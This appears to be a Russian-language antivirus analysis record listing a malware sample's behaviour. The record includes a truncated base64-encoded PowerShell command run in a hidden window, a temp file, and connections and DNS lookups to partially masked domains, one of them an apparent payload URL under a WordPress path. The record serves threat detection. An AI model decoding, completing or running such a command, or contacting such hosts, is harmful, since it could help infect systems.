Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEQAQQBVAEEAUQBDADQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEwAawB4ACcALAAnAF8AQwAnACkALAAnAEEAbwBVACcAKQA7ACQASgBCAEEAMQBDAFEAIAA9ACAAJwAzADUAOAAnADsAJ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1984
- %TEMP%\988391.cvr
- 'ne#.##dogshop.eu':443
- 'ma####rading.com':80
- 'ma####rading.com':443
- http://ma####rading.com/wp-includes/v_eB/
- 'ne#.##dogshop.eu':443
- 'ma####rading.com':443
- DNS ASK bu##cows.ca
- DNS ASK vi#######fingcontractors.com
- DNS ASK me####ideogroup.com
- DNS ASK ne#.##dogshop.eu
- DNS ASK ma####rading.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEQAQQBVAEEAUQBDADQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAEwAawB4ACcALAAnAF8AQwAnACkALAAnAEEAbwBVACcAKQA7ACQASgBCAEEAMQBDAFEAIAA9ACAAJwAzADUAOAAnADsAJ...' (со скрытым окном)